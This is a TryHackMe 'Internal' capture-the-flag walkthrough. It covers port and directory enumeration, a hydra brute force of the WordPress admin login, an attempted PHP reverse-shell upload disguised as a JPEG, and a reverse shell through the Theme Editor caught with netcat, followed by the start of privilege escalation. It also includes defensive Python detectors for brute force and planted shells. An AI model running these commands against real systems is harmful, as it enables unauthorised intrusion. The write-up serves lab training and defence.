# Tryhackme - Internal - The Easy Way Walkthrough

`<YOU CAN USE THE HARD WAY IF YOU WANT TO>`

### **Goal:** Boot to Root

### **1. Enumerations:**

I started the room with a few nmap scans to make sure that I didn't miss any ports:

```shell
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sN 10.10.158.154
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:16 +07
Nmap scan report for 10.10.158.154 (10.10.158.154)
Host is up (0.23s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http

Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sN -p- -A --min-rate 8000 -T4 10.10.158.154
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:18 +07

                                                                            
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sN -p- --min-rate 8000 -T4 10.10.158.154 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:18 +07
Nmap scan report for 10.10.158.154 (10.10.158.154)
Host is up (0.23s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http

Nmap done: 1 IP address (1 host up) scanned in 10.42 seconds
                                                                              
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sS -p- --min-rate 8000 -T4 10.10.158.154
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:19 +07
Nmap scan report for 10.10.158.154 (10.10.158.154)
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.97 seconds
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sS -p- --min-rate 8000 -T4 10.10.158.154
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:20 +07
Nmap scan report for 10.10.158.154 (10.10.158.154)
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sV -A -p 22,80 10.10.158.154
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:40 +07
Nmap scan report for internal.thm (10.10.158.154)
Host is up (0.23s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 5 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   96.71 ms  10.17.0.1 (10.17.0.1)
2   ... 4
5   231.19 ms internal.thm (10.10.158.154)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.37 seconds
```

I also did some `ffuf` directory fuzzing:

```shell
┌──(kali㉿kali)-[~]
└─$ ffuf -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '' -u "http://10.10.158.154/FUZZ"           

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.158.154/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 1392ms]
blog                    [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 3354ms]
wordpress               [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 221ms]
javascript              [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 218ms]
phpmyadmin              [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 232ms]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 233ms]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 219ms]
:: Progress: [220547/220547] :: Job [1/1] :: 138 req/sec :: Duration: [0:22:52] :: Errors: 0 ::
┌──(kali㉿kali)-[~]
└─$ ffuf -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '.php' -u "http://10.10.158.154/FUZZ"

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.158.154/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.php                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2329ms]
blog                    [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 3314ms]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 3316ms]
wordpress               [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 229ms]
javascript              [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 231ms]
phpmyadmin              [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 231ms]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 228ms]
.php                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 228ms]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 218ms]
...
...
```

Seeing `/blog` and `/wordpress`, I immediately visited them, quickly glancing through the source code and looking for entry points:

<figure><img src="https://2237635920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsqRDWHkWdxahOJoG5Uc5%2Fuploads%2FDnUygne4hthqBvtOtFFy%2FPasted%20image%2020250603101742.png?alt=media&#x26;token=8b9b45a6-6f61-4c9b-848b-8a368213a744" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2237635920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsqRDWHkWdxahOJoG5Uc5%2Fuploads%2FoPYu8IgVUPP5kq4oojD2%2FPasted%20image%2020250603101820.png?alt=media&#x26;token=ea8c11ab-70c1-4d7b-abc3-0f325907eccd" alt=""><figcaption></figcaption></figure>

From the `Wappalyzer` extension, we could see that the site is running `WordPress v5.4.2`. I looked for interesting entry points on this site while also running `wpscan` and some `ssh` enumeration (I tried sqlmap too, but figured it wasn't the way):

Nmap and netcat `ssh` enumeration:

```shell
┌──(kali㉿kali)-[~]
└─$ nc -vn 10.10.158.154 22               
(UNKNOWN) [10.10.158.154] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
^C
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -p22 10.10.158.154 --script ssh2-enum-algos
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:58 +07
Nmap scan report for internal.thm (10.10.158.154)
Host is up (0.23s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh2-enum-algos: 
|   kex_algorithms: (10)
|       curve25519-sha256
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group16-sha512
|       diffie-hellman-group18-sha512
|       diffie-hellman-group14-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       ssh-rsa
|       rsa-sha2-512
|       rsa-sha2-256
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com

Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -p22 10.10.158.154 --script ssh-hostkey --script-args ssh_hostkey=full
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:59 +07
Nmap scan report for internal.thm (10.10.158.154)
Host is up (0.22s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzpZTvmUlaHPpKH8X2SHMndoS+GsVlbhABHJt4TN/nKUSYeFEHbNzutQnj+DrUEwNMauqaWCY7vNeYguQUXLx4LM5ukMEC8IuJo0rcuKNmlyYrgBlFws3q2956v8urY7/McCFf5IsItQxurCDyfyU/erO7fO02n2iT5k7Bw2UWf8FPvM9/jahisbkA9/FQKou3mbaSANb5nSrPc7p9FbqKs1vGpFopdUTI2dl4OQ3TkQWNXpvaFl0j1ilRynu5zLr6FetD5WWZXAuCNHNmcRo/aPdoX9JXaPKGCcVywqMM/Qy+gSiiIKvmavX6rYlnRFWEp25EifIPuHQ0s8hSXqx5
|   ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMFOI/P6nqicmk78vSNs4l+vk2+BQ0mBxB1KlJJPCYueaUExTH4Cxkqkpo/zJfZ77MHHDL5nnzTW+TO6e4mDMEw=
|_  ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMlxubXGh//FE3OqdyitiEwfA2nNdCtdgLfDQxFHPyY0

Nmap done: 1 IP address (1 host up) scanned in 7.51 seconds
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -p22 10.10.158.154 --script ssh-auth-methods --script-args="ssh.user=root"
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 23:00 +07
Nmap scan report for internal.thm (10.10.158.154)
Host is up (0.22s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-auth-methods: 
|   Supported authentication methods: 
|     publickey
|_    password

Nmap done: 1 IP address (1 host up) scanned in 5.14 seconds
...
...
```

* Explanation:
* `nc -vn 10.10.158.154 22`: Banner grabbing
* `nmap -p22 10.10.158.154 --script ssh2-enum-algos`: Retrieve supported algorithms
* `nmap -p22 10.10.158.154 --script ssh-hostkey --script-args ssh_hostkey=full`: Retrieve the full host keys (the script also flags known weak keys)
* `nmap -p22 10.10.158.154 --script ssh-auth-methods --script-args="ssh.user=root"`: Check authentication methods

After that `wpscan`:

`wpscan --url http://internal.thm/blog/ --enumerate u,ap,at`:

This enumerates:

* `u` → usernames
* `ap` → all plugins
* `at` → all themes

```shell
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://internal.thm/blog/ --enumerate u,ap,at

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.158.154]
[+] Started: Mon Jun  2 23:11:24 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.9
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:25:12 <========================================================================================================================================================> (29685 / 29685) 100.00% Time: 00:25:12
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] twentynineteen
 | Location: http://internal.thm/blog/wp-content/themes/twentynineteen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://internal.thm/blog/wp-content/themes/twentynineteen/style.css
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentynineteen/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Aggressive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentynineteen/style.css, Match: 'Version: 1.5'

[+] twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.9
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Aggressive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 2.3'

[+] twentytwenty
 | Location: http://internal.thm/blog/wp-content/themes/twentytwenty/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://internal.thm/blog/wp-content/themes/twentytwenty/style.css
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentytwenty/, status: 500
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentytwenty/style.css, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <==============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jun  2 23:37:01 2025
[+] Requests Done: 29756
[+] Cached Requests: 9
[+] Data Sent: 7.893 MB
[+] Data Received: 5.14 MB
[+] Memory used: 303.816 MB
[+] Elapsed time: 00:25:36
```

Now I have `admin` as the username; next I need an entry point:

<figure><img src="https://2237635920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsqRDWHkWdxahOJoG5Uc5%2Fuploads%2FBG7rzsap6yPhUuQb2bis%2FPasted%20image%2020250603103925.png?alt=media&#x26;token=d4f484da-8fd7-445a-8fb5-033a4620db02" alt=""><figcaption></figcaption></figure>

Found it.

<figure><img src="https://2237635920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsqRDWHkWdxahOJoG5Uc5%2Fuploads%2FDlgNaZBmDmPQeFvLWAds%2FPasted%20image%2020250603104005.png?alt=media&#x26;token=1a8c0cbe-fd41-4fbf-b80e-f10077290b1b" alt=""><figcaption></figcaption></figure>

I had tried SQL injection, even `sqlmap`, without much success, so I decided not to use Metasploit and go old school with `hydra`. I captured a login request and studied it a little:

```http
POST /blog/wp-login.php HTTP/1.1
Host: internal.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://internal.thm/blog/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Origin: http://internal.thm
Connection: keep-alive
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
Priority: u=0, i

log=a&pwd=a&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1
```

And the error for entering a wrong password:

```html
Error: The password you entered for the username admin is incorrect
```

With that, I built the command based on the hydra command structure:

```shell
hydra -l <username> -P <password list> <ip> -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:C=cookies:S=Location'
```

```shell
┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt internal.thm http-post-form "/blog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1:F=incorrect" -q -t 10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-03 00:32:07
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
...
...
[STATUS] 1327.00 tries/min, 3981 tries in 00:03h, 14340418 to do in 180:07h, 40 active
[80][http-post-form] host: internal.thm   login: admin   password: my2boys
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-03 00:35:29
```
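Both noisy phases above, the `ffuf` directory brute force and the `hydra` login brute force, leave an obvious footprint in the web server's access log. The following detector is an added example, not part of the original post: it assumes Apache "combined" log format and uses constructed log lines; the window size and thresholds are assumptions to tune per site.

```python
"""Flag ffuf-style directory enumeration (many distinct 403/404 paths from one
IP) and hydra-style login brute force (many POSTs to wp-login.php from one IP)
in Apache access logs. Added example; log lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format (assumed), e.g.
# 10.0.0.5 - - [03/Jun/2025:00:32:10 +0700] "POST /blog/wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, window_s=60, enum_threshold=20, login_threshold=10):
    """Slide a window_s-second window over each source IP's requests and return
    {"dir_enum": {ip: max distinct 403/404 paths}, "login_bruteforce": {ip: max wp-login POSTs}}
    for sources that cross a threshold. Behaviour is counted rather than the
    User-Agent string, because the tools let the operator set any UA."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)
    dir_enum, login_bf = {}, {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        left = 0
        for right, rec in enumerate(recs):
            while rec["ts"] - recs[left]["ts"] > timedelta(seconds=window_s):
                left += 1
            win = recs[left:right + 1]
            missing = {w["path"] for w in win if w["status"] in (403, 404)}
            posts = sum(1 for w in win
                        if w["method"] == "POST" and w["path"].endswith("/wp-login.php"))
            if len(missing) >= enum_threshold:
                dir_enum[ip] = max(dir_enum.get(ip, 0), len(missing))
            if posts >= login_threshold:
                login_bf[ip] = max(login_bf.get(ip, 0), posts)
    return {"dir_enum": dir_enum, "login_bruteforce": login_bf}


def sample_log():
    """Constructed log: 10.0.0.5 fuzzes 25 paths within 10 s, then fires 15 login
    POSTs two seconds apart; 10.0.0.9 is an ordinary visitor with one login."""
    t0 = datetime(2025, 6, 3, 0, 32, 7, tzinfo=timezone(timedelta(hours=7)))

    def line(ip, dt, method, path, status):
        return (f'{ip} - - [{dt.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" '
                f'{status} 278 "-" "Mozilla/5.0"')

    out = [line("10.0.0.5", t0 + timedelta(milliseconds=400 * i), "GET", f"/w{i}", 404)
           for i in range(25)]
    out.append(line("10.0.0.5", t0 + timedelta(seconds=11), "GET", "/blog", 301))
    out += [line("10.0.0.5", t0 + timedelta(seconds=120 + 2 * i), "POST",
                 "/blog/wp-login.php", 200) for i in range(15)]
    out += [line("10.0.0.9", t0 + timedelta(seconds=30 * i), "GET", "/blog/", 200)
            for i in range(3)]
    out.append(line("10.0.0.9", t0 + timedelta(seconds=95), "POST", "/blog/wp-login.php", 302))
    return out


if __name__ == "__main__":
    print(detect(sample_log()))
```

The login error shown above also confirms the username to whoever is guessing; the WordPress `login_errors` filter lets a site return a generic message instead.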

With that, I'm in. I poked around a bit and tried uploading a PHP shell with a spoofed JPEG header:

```php
ÿØÿÛ

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
...
...
```

The upload trick and plugin editing both failed: none of those locations are writable, so they can't be edited.\
As in `Tryhackme - Daily Bugle`, I tried the `Themes` and `Theme Editor` instead:

<figure><img src="https://2237635920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsqRDWHkWdxahOJoG5Uc5%2Fuploads%2FRYoNxm94xIOqnKdej52k%2FScreenshot%202025-06-03%20011332.png?alt=media&#x26;token=d5649f90-30d1-49a6-ae22-e65684420ad4" alt=""><figcaption></figcaption></figure>

Set up a netcat listener and visit `http://internal.thm/blog`, and we get our reverse shell:

```shell
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444

listening on [any] 4444 ...
connect to [[YOUR IP]] from (UNKNOWN) [10.10.74.67] 41110
Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 18:20:15 up 4 min,  0 users,  load average: 0.45, 0.35, 0.17
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@internal:/$ 
```
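Both shell routes tried above, a JPEG-header polyglot in the uploads folder and a theme file rewritten through the Theme Editor, are visible on disk. The following checker is an added example, not part of the original post: it builds a hash manifest of a constructed `wp-content` tree, diffs it after the two changes, and hunts for "images" that contain PHP open tags.

```python
"""Spot a theme file changed via the Theme Editor and a JPEG-header file that is
really PHP under wp-content. Added example; the wp-content tree is constructed."""
import hashlib
import os
import tempfile

JPEG_MAGIC = b"\xff\xd8"            # the FF D8 the spoofed upload started with
PHP_MARKERS = (b"<?php", b"<?=")
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif")


def manifest(root):
    """Map relative path -> sha256 hex digest for every file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                out[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out


def diff_manifest(baseline, current):
    """Return (added, modified, removed) relative paths, each sorted."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and baseline[p] != current[p])
    return added, modified, removed


def polyglot_uploads(root):
    """Files that look like images (by extension or JPEG magic) yet contain a PHP open tag."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                data = fh.read()
            looks_image = name.lower().endswith(IMAGE_EXTS) or data.startswith(JPEG_MAGIC)
            if looks_image and any(marker in data for marker in PHP_MARKERS):
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def demo():
    """Constructed wp-content: take a baseline, then simulate the two changes."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "themes", "twentyseventeen")
        uploads = os.path.join(root, "uploads", "2025", "06")
        os.makedirs(theme)
        os.makedirs(uploads)
        with open(os.path.join(theme, "404.php"), "w") as fh:
            fh.write("<?php get_header(); ?>\n")
        with open(os.path.join(theme, "style.css"), "w") as fh:
            fh.write("/* Theme Name: Twenty Seventeen */\n")
        baseline = manifest(root)
        # Theme Editor rewrites 404.php; a JPEG-magic file with PHP inside lands in uploads.
        with open(os.path.join(theme, "404.php"), "w") as fh:
            fh.write("<?php /* rewritten via Theme Editor */ ?>\n")
        with open(os.path.join(uploads, "shell.jpg"), "wb") as fh:
            fh.write(JPEG_MAGIC + b"\xff\xdb\n<?php /* not really an image */ ?>\n")
        added, modified, removed = diff_manifest(baseline, manifest(root))
        return {"added": added, "modified": modified, "removed": removed,
                "polyglots": polyglot_uploads(root)}


if __name__ == "__main__":
    print(demo())
```

Defining `DISALLOW_FILE_EDIT` as true in `wp-config.php` removes the Theme Editor route entirely; the manifest diff then catches anything that still manages to change a theme file.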

### **2. Privilege Escalation:**

```shell
www-data@internal:/$ sudo -l
sudo -l
[sudo] password for www-data:
# Well, no sudo -l
```

```shell
www-data@internal:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
